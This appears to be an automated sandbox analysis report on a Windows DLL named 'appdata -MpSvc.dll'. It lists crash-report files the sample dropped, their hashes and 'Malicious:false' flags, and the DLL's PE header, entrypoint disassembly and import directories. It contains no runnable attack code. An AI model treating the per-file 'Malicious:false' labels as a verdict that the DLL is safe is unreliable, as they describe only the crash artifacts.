                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.0.4.5.6.2.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.4.3.9.7.5.1.3.9.9.8.7.5.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.1.9.8.3.f.-.a.a.5.8.-.4.0.7.4.-.9.e.a.7.-.4.b.e.b.5.7.d.6.4.a.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.5.2.5.0.3.5.-.5.5.0.8.-.4.2.a.7.-.8.5.2.f.-.e.9.e.f.5.a.1.8.d.e.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.4.-.0.0.0.1.-.0.0.1.4.-.c.e.7.a.-.3.9.a.f.8.9.7.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:44 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):49840
                            Entropy (8bit):1.9032938039379848
                            Encrypted:false
                            SSDEEP:96:5MS8aUE3TlxTe7+bIksLeuJOwG8X5RP/oi75I4v4mq5Hfa0Qyw9IVQ/11Z1sok3M:qhGuFXUO5H4wMV6XphLExLp8B1EP+u4
                            MD5:B86C71C530E673D75223ADACF96685B0
                            SHA1:97279C5493822058A4F24F3A8EA2C5141EF33CB1
                            SHA-256:40DD2B0F219D883C615A49BE1DED6527246BF398AFBFBDC448615998629ACEB8
                            SHA-512:FDB34EDD46485B672E9D2D4B1CC5A937E0491820AE076D4D9A9ED98EC34E8DC3E3DF60749C146DB7C040C57B35176307AE263C31D4CF0D66B44DD024EC34EACC
                            Malicious:false
                            Preview:MDMP..a..... .......@^.e........................(...............4/..........T.......8...........T............... .......................................................................................................eJ......x.......GenuineIntel............T...........?^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8334
                            Entropy (8bit):3.689231439067909
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJU66w6YNDC6xggmf8AoDpru89bQ/sfmwm:R6lXJh6w6YxC6xggmf8AoJQkfY
                            MD5:280DDC83A799D3E2C3357CBD9C86703F
                            SHA1:892E42561A9CF3C9B5895D739C06365B4E700AA5
                            SHA-256:104B070AB5CE75547F0888CCC5C075BFFD61E8830FAF08D54891F1D3CFA2B77C
                            SHA-512:44EDB2E6979F614351A064A9690E3FE43E8A56E9ED0CC0A653DF4CB9257B9D68C6B05298D1D9D8B53AFE05C582ACCF12AE837E2EEC4E09C7D2815D16A842D4B0
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.4.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4759
                            Entropy (8bit):4.448575800750847
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsFJg77aI9OkcWpW8VYFYm8M4JCdPvdFI+q8vjPv0ZUGScSDd:uIjffI7ZV7VNJHKYZUJ3Dd
                            MD5:3F3605970A46A28BCD1A261B6A263D50
                            SHA1:FF379748118620EA576EC0046DC952A63CD8A477
                            SHA-256:77D3477BD22616E6DDEB6F84F2250DCDDFD06A766D34F2DC2D20F05499048B0B
                            SHA-512:AE741B4E287FA7A4F730548B9212100C0C0F9852EB192B61ED95D4CF4B2CC276224DC9A7A1F2F76E0ED6B650BCC8BEF45F299F909EE8ED49F639E66F6FDE8E38
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:53 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):44688
                            Entropy (8bit):2.022935002067335
                            Encrypted:false
                            SSDEEP:192:F64p1n+XqyAUO5H436SMXQCzImScLpk2ob:fp19b5Hg69XQuJScL4
                            MD5:4AFCA2AACD57B809C9EC6E3B76734330
                            SHA1:B6360802F369384E7A5134A738559A9E37A2F749
                            SHA-256:F5DEC393DCBD8D41AC9E23E7F8B5CA5A9AEBCBD426F34628DC0A87FF9861FE53
                            SHA-512:958091D05DA5A293B6AEC122D2492FCD135444CC1985BD2BAEE8833BE8A19EF35D405505F7A1174A6B37540874926FE24EFB2597AFDA0F52EF31CF313EC5793E
                            Malicious:false
                            Preview:MDMP..a..... .......I^.e........................(...............8,..........T.......8...........T...........@...P.......................................................................................................eJ......H.......GenuineIntel............T.......t...H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:53 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):44488
                            Entropy (8bit):1.9696186046168105
                            Encrypted:false
                            SSDEEP:192:F6kB+XcWvGO5H44x+TzWTBJFy6JADWbCOeU:d/i5H0WT1y6JdHT
                            MD5:10C3BCFC7FC982E7BFE26E3A4BB6878E
                            SHA1:81530E8FBA6357BFB1169580BD72A8E481ED5564
                            SHA-256:A811818E78F1A12D56C39E4D29F45C59719F887978BBC50A20F67652FBE439C1
                            SHA-512:0C7CDDE8F5FF8AAFB087DCCFF5FFAFEE326059724576643BDBE4681DB61C7AF5FAC71FF42B926822ADC7DEB703109D9F4683F6EC0511C8767CECA84DA51944D7
                            Malicious:false
                            Preview:MDMP..a..... .......I^.e........................(...............8,..........T.......8...........T...........@...........................................................................................................eJ......H.......GenuineIntel............T...........H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8300
                            Entropy (8bit):3.6946553882280333
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJja666Y0DJ65wgmfTMDprw89bOosfqvUam:R6lXJ+666YuJ6egmfTMTObfqvo
                            MD5:563969A99C863316CC9868020C89EBC8
                            SHA1:225DD403294F99DB5B374A766CFEAD0C3C626B7B
                            SHA-256:A9FC87AC99BC07EC9CCC5B1654AE6D5B46A973A886B28B1994128C05DC245DEC
                            SHA-512:E690569251E5BDB8611019323461D09EAAD969927060E6B0D9306F5E3318FB6116DE136661FDAB8640AFD9E81324D19E50BE04318725BC62A9B3BD9036F7D38B
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.0.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8364
                            Entropy (8bit):3.6930693322569046
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJk6686Y0Du65wgmf8AoDprw89bOxsfCiVam:R6lXJh686Yuu6egmf8AoTOqfCC
                            MD5:1F4F7EA83A2DE8AAF14D976060D2AA71
                            SHA1:AEC11A9E231F538A886D4684574A1835C7CBD363
                            SHA-256:2DFB32ECDFE5F28B1EEC4AD0EE8A6350F0B9F7B8CEFDD9111D0606278CE9D88C
                            SHA-512:D145A6602DA0B0389B599DC449931C960D165B822A9526D60F26C262E8BB529A56E3AB13D872B3486114376CFE39D8BFA512CF405C9C70908D5421B072B8E450
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.5.6.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4658
                            Entropy (8bit):4.464432536486927
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsFJg77aI9OkcWpW8VYvYm8M4JCdPvHFfa+q8/ZT8UGScS5d:uIjffI7ZV7VLJj/UJ35d
                            MD5:C19630A240AF78EB46C9F6E9E538006A
                            SHA1:ECAE12C9FD2369B3C3C327C5F3CF153CD977A48B
                            SHA-256:5A2213DA76D1532F41C8653A8BEB86740ADACDC57B1DD6067374351BC3DD4C39
                            SHA-512:4C4C46917A01F2D32440E122AEF305CC722BE53C071E8D6628F1ED2DC8979331C1A1E1D135D3C600C113872718243AD2B2E4006921F7100B8A02E3830B3DB9DF
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:55 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):121986
                            Entropy (8bit):1.9828881037080905
                            Encrypted:false
                            SSDEEP:384:+9od9QKeTDZN5HzP90J8zzLiHafGTfeCO7wLH/kDabcFsb4Dg:bgpZN5zP9t3WyGTfeCxH8bsyg
                            MD5:C361D15A47A8170B0166177480475A88
                            SHA1:0B6910D596C406AB301A017DBF4EF413BEF8029A
                            SHA-256:CE5733950EB2B08CBB15A1EA963D1759BE6CBFDC987550BAB08B986E7A97ADFB
                            SHA-512:C2E16C14C8A0423A49C1E460AFDACDC87065A46346B6B4C28D0A706B01A81ECC8179557FC5A552EDD659C1D57F58A5FA04853A3C4868767FCA616D50535C25EA
                            Malicious:false
                            Preview:MDMP..a..... .......K^.e......................... ..........D...~S..........T.......8...........T............S..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.......d...H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8320
                            Entropy (8bit):3.6959831051334984
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJB/656Y0Q65wgmfT64cDprH89b4Esfy2om:R6lXJZ656Y76egmfT64cm43fyw
                            MD5:706C1D93F02667147785979242051B19
                            SHA1:75B2F44E5DAE8653F7C659139CA01B1A69E56EBC
                            SHA-256:D7A7D44C20F294520E7C70623F583DBCDBBFD00FB60C7CEA020A57C75B630355
                            SHA-512:E1DC563FABEDA16FB067F93EC6586EEE2A48A64D5ABD0D3BE6A95A3AA1BF73E26D2FD6479BD4A7870221FB13DC54F56BD4FEC57FBB4F061F8D1D7A9C3660B014
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.4.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4666
                            Entropy (8bit):4.4823829558571955
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsFJg77aI9OkcWpW8VYwYm8M4JCdPJFL+q8/uXXUGScS/d:uIjffI7ZV7VYJw1XUJ3/d
                            MD5:FD7E86A7B5145B3141D599C922A25AF6
                            SHA1:021F9F5A72B0838E2AA1BC31BB16866086F29B25
                            SHA-256:A3E9EF3AE2CE056CF92C05E5D8F92998D237E9E0F9DC9EDFE23EC078C9B84F64
                            SHA-512:FEF9C8D41C14E8A6D7F9DE70457AC67397D25F7A20BEE54DCBDD3F4A7114D713CE05528F8A5FA04859BEC6F05C2456F7867EE12B7C80595EE815155AB87B179C
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.42227083211249
                            Encrypted:false
                            SSDEEP:6144:vSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNP0uhiTw:6vloTyW+EZMM6DFyl03w
                            MD5:9C80C530F6C438E7E25884223EDF3AF0
                            SHA1:7E0040E59A0BAC6909D105BFEC9B3A7DEBF7D9D8
                            SHA-256:56AA9290C87C314D5C974C1B58988ED00EE5AFDF547829031DC3BADD7A6DCFD8
                            SHA-512:9A9F064517D3220ACB076112BF53A5F1DA3B275B13EF472995CEF3A50199E853FD58DC07F49D7F8FA840A596D929E6CFFDBFFED6A2C1834A182BBBAFCBEADC75
                            Malicious:false
                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c...q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):1.0541805421345023
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 95.46%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 3.96%
                            • Win16/32 Executable Delphi generic (2074/23) 0.20%
                            • Generic Win/DOS Executable (2004/3) 0.19%
                            • DOS Executable Generic (2002/1) 0.19%
                            File name:appdata -MpSvc.dll
                            File size:26'239'902 bytes
                            MD5:504356291f6139c3400cdd7842bc1406
                            SHA1:eaae969b5db3779fbb9a1bba694468b003822c77
                            SHA256:34a5017f3894d9d403fd2c5baa03d7bb6b9c28afb74e36010310af8f601602fb
                            SHA512:260fa1552a7222b90707035c93899a281c996d0316f75946195c40710e60992f3555ad01fec03c45eb81710064d8947939a5e1c6e5f3cd617aa1374ba645bb19
                            SSDEEP:24576:cMVKcnCjOGVNZXkLkswbSZ+UJ2L4yE9Ivvo5nlgzNNqFBsS4ETlX/sTTz7GMLIrN:7Y2UnaJGEF6S40sTbGM0oTAiEwdwb
                            TLSH:9D476D23B684763AC07F1A395427A654993FB76235969DAF57F00C4CCF365802A3FA0B
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                            Icon Hash:7ae282899bbab082
                            Entrypoint:0x650898
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x65D69275 [Thu Feb 22 00:16:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:4c1f56b4c50db99105e4a3eba0452881
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFC0h
                            mov eax, 00647210h
                            call 00007FFAE0906595h
                            call 00007FFAE08FF61Ch
                            lea eax, dword ptr [eax+00h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x2660000xd2.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2610000x3f00.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x29e0000xc800.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2680000x352e0.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x261bb40x9ac.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2650000xac6.didata
